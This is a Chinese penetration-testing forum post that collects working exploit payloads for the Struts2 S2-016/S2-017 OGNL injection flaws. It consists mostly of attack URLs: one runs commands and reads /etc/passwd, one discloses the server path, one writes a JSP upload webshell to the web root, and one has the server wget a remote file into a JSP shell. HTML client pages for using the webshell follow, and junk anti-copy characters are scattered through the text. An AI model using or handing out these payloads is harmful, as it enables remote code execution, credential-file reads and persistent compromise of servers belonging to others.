找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3375|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。0 Q" Y; z' t; R; @" k) I% b
+ D' X  X8 T3 N* \% f- H
喜欢就点一下感谢吧^_^3 U" j7 f( i/ H1 R! p7 \, U

  x* Y, q) P9 o1 j7 D% k带回显命令执行:
1 C( w. v0 l: @5 H  s, z9 a9 N6 z+ s% I2 X
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}' h' a7 r' k) m' d* F7 J
5 _0 t5 l" B# W/ ]! f

9 M7 g$ k; K$ M- O1 M( y. M9 ~% ?. ^& `# B- i0 F) w

( i- b5 R0 R% X$ B, X2 `' f8 o. Q* @/ ~6 O# v5 R6 i) k0 z4 ]% S, X. l
# e" w' P% R0 [4 j6 N
/ ~" t9 i8 q8 |6 |
爆路径:
& H) o: h5 U* O# N
' A1 L% P; {. @- _* rhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D# g' ]4 y6 ]; j6 g/ ^* m& e0 l! j7 ~
  L6 f/ b0 _6 U. b+ s/ b! w

& p# `1 V+ D5 m
# ]* u# d( a" Q2 w; r5 {: c7 d$ }2 y. X: i2 [
0 a  M  Y' T' Y1 Z! E6 o
写文件:$ V3 i  C/ R: v/ a+ P

- c$ T  h0 B6 u0 Bhttp://www.example.com/struts2-blank/example/X.action?redirect:${) m/ J* Z) x9 f* y1 c
% `* W( u( z9 V# [( O! _' C6 U) a
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),5 L0 O1 G9 r7 G9 d
. X: Y1 I5 \% c
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),! A: Y1 h, L7 [0 I. k

/ T" O) `; i  q4 `new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()2 H5 V, z+ n( i
7 R' C" X0 t4 R% K+ i. S
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
# {3 P$ z  @* n2 |6 b3 a/ ~7 R
- W0 m) U: I+ s* C% X, |- O& D* z
8 z# l/ C' d# g
写入的文件内容:! ~3 h8 @+ Q/ ^6 w& {
, D% p9 {# L2 w
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
6 S- z" i, |( y5 H$ [( T, k
7 A, W& q0 z& L! t% q3 e/ q其实就是一个jsp的小马,需要客户端配合                                                                                 
1 N; O, X" h4 F, b" Q- o$ ~& _3 u0 ]& `- I) N7 s' F
函数f是文件名,t是内容  R7 b  o# ~% y

+ ^; ]8 R* G6 V; ~! n客户端:
4 Q( B+ g$ s! B0 q5 r
- O8 y: I/ S( N9 q" U$ U! B<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">0 J( b! F4 p' U  \1 I7 g2 q

) f( p! B' S% B<textarea name=t cols=120 rows=10 width=45>your code</textarea>7 O' y/ }4 ~& V* [5 A7 I/ w2 {4 k
# M; z$ }% z2 {, {
<center>- _4 x6 ^6 E, T
7 t! e2 D( }1 G

) Z( X4 I" g. h) \8 {1 O+ j% Z( U0 i) o4 R7 I* _
<input type=submit value="提交">" X' `2 `1 K5 N

4 ~# n7 w& ]' }5 N2 `& ~  C</form>3 ^' h0 C( l5 J) T/ \

; x9 i$ Y- ?' E8 a: U' r就在当前目录建立一个fjp.jsp
) d& K; Q) `! i4 Z8 j# z2 d1 T2 S$ T% X
shell:http://www.example.com/struts2-blank/example/fjp.jsp
0 i& Y) x, |8 S6 H+ }# }6 J+ _) G$ E& a# Z1 k: v

/ c0 K. B) }& w+ L
# t3 x; g% ]8 q3 d4 Q7 F6 {' |还有@园长的一个客户端:
6 k) }+ o4 {7 K# y
% p* s% Q  \* d! Q# v; \9 c<html>4 j& e/ W. C" ~; [9 N
$ k6 P* T  n* E2 Q8 y  ?# b" c
<head>6 p& E" m. W+ }! \/ W0 q& n* E. ~
+ t; ^. \  B4 {$ M
<meta http-equiv="content-type" content="text/html;charset=utf-8">1 t# X: r5 G) `  C2 L6 {
8 w: E( n3 b+ k" c
<title>jsp-园长</title>
8 B9 M5 u; O  r5 B& |* D
. x. Y) I7 p1 c6 x: V- ?/ [8 F</head>
* E) ?5 V2 M* M1 H5 t* O
  S) U: U! o* g% g<style>
1 d" \4 b% a+ v$ e+ a# }
! J6 j3 R! S' H2 ]% i! F. h, u4 V.main{width:980px;height:600px;margin:0 auto;}
, k' V# f' ]1 K
( ^9 i8 @- g/ t  B5 a% J# m" Q.url{width:300px;}
, {/ ]! Q. `. @& b8 w, T
/ `/ \9 O0 x9 h& f.fn{width:60px;}3 B$ Z5 Z, z( ?4 s6 p
1 F. \& N9 P8 P# y! w$ R
.content{width:80%;height:60%;}
7 W0 b% ~9 y1 Q% V2 a1 V$ n- C- @0 ~) o, F1 L) V' Q2 N5 J
</style>6 s: B( C- e- e6 W$ U
/ b6 N$ L  S6 K7 h( j3 M
<script>5 z$ N' S6 s+ e

4 @2 Q5 _5 \) i  F7 |  function upload(){
4 [! @' E6 L. z' x& w9 P9 m6 C' K; v, Y
    var url = document.getElementById('url').value,8 e5 @8 F/ P. z# J
; e. f7 n8 G. }
      content = document.getElementById('content').value,
" C# x, y" R  N# e0 @, ]" c. t' m  x+ e' {8 r$ e8 I
      fileName = document.getElementById('fn').value,& s4 K9 A  q1 e5 E$ w( l

! {# q% b. n( c( {1 D7 L% q      form = document.getElementById('fm');4 R0 P' m4 h5 a' k
. _$ p; t6 z* l; ?4 N- c9 o
    if(url.length == 0){4 u4 t  ]8 T+ ^" t+ z& v" ?7 F; j

: I; ^2 r) d% N4 @0 w: R      alert("Url not allowd empty!");- y- T% g% W+ r8 M4 d
4 Y4 a9 M, ?  B
      return ;
, E) P# e, S/ [6 Y
' A, |# N6 D, J5 o" g8 ]8 |8 ^. Q+ b    }, D9 Z/ G5 \  a5 }5 I4 X
4 J% j) L* f4 {- I; X' Y& f
    if(content.length == 0){) m, e/ y9 l1 H& d- s( R7 Y

% P- C: c0 q( N3 R& g      alert("Content not allowd empty!");
$ w" B* E) E& \
* i* J' Q* [# [: c9 @: ^9 {2 _, _      return ;9 F8 ]& L. ?6 h3 f, l
$ E+ _# I, D, i3 i* _* I
    }) X; X& x7 A) |; _  J- t

. |; ~4 ]8 k# h* \; v    if(fileName.length == 0){7 m. A% r6 W- r- |( B# v7 s" v

$ Y* C/ u$ l. _) V      alert("FileName not allowd empty!");
$ d4 i! a8 w) @, b: d- _
! h( T1 a% a# ]$ ^! _; X0 e      return ;6 T( N6 X2 h5 J) C$ w" v

, i" [, Q/ n; Q. T0 ?    }
% d7 m. p/ @9 W2 f6 G+ E! q
/ \  d0 `5 Z( k+ Y/ h    form.action = url;
/ }; k7 a( N% p  T" W; [$ z
) Z& ?, P* g, F- `) f    form.submit();3 P  l/ U! {1 S  _1 b

9 P. v4 u3 c/ h& \7 D. v) Z, J8 O, |  }
: t* g! U7 R% X- r+ S" ?2 I+ w0 {  W4 a* j. t% a# ~! q7 A1 _6 c1 M3 v
</script>! E. c" d) F2 L( e
/ A6 l" k% t! p( T$ D2 ]4 b
<body>0 {- W7 d; D7 r- E& D; q

% N$ C. ~  D! J<div class="main">5 a% x! i, {; T) ]5 \# x& |5 {
  a/ \% L8 W2 {- ?7 R6 m
  <form id="fm" method="post">  
  I1 x( \6 c# q- z( r$ x& L  n
1 ?9 F$ b0 q; `4 }( N. h! E    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  5 m( D2 z4 g% N  u+ f$ u

" L6 O5 F5 e+ Z( D+ G! p6 w5 i    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ! d& E  G+ z, D9 r; t& R& ~

: n& Q+ m* C' l    <a href="javascript:upload();">Upload</a>
- n5 q! a+ M2 X4 v: `, `. Q  ?' _8 }: @/ C4 B
, F& I0 {) B% c# V

0 ^7 |7 o9 l6 D+ U" `  j0 H    <textarea id="content" class="content" name="t" ></textarea># E) D0 U& d+ i6 w4 r

% h# F; |* e9 P, |8 [* _  </form>
6 \$ k, E8 Q2 j" U1 B, q5 M4 _1 B+ o. }9 |" \
</div>  |: F# I0 k5 z+ d8 Y3 e; E4 T
( X- {; _4 q- A# U3 `! ?2 f
</body>
6 ~- L8 ~& @9 w( F7 A$ u& J: `, s' o; I$ r( C& u
</html>- F$ o9 a* B8 Q. G; s9 O9 D. u
: c* V8 L$ x0 j1 ~# u+ S
# d+ s8 m# c* ~1 S

1 k: \, y5 G8 A7 G- Z还有@X发的一个wget的getshell! x& k2 e  d% C: O
7 B( n+ o: S9 u! }0 ^
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}9 X# `, B! `# p( o6 W
' s5 `0 d& s6 b3 o( f
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}; T# h' m4 y4 [* s
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表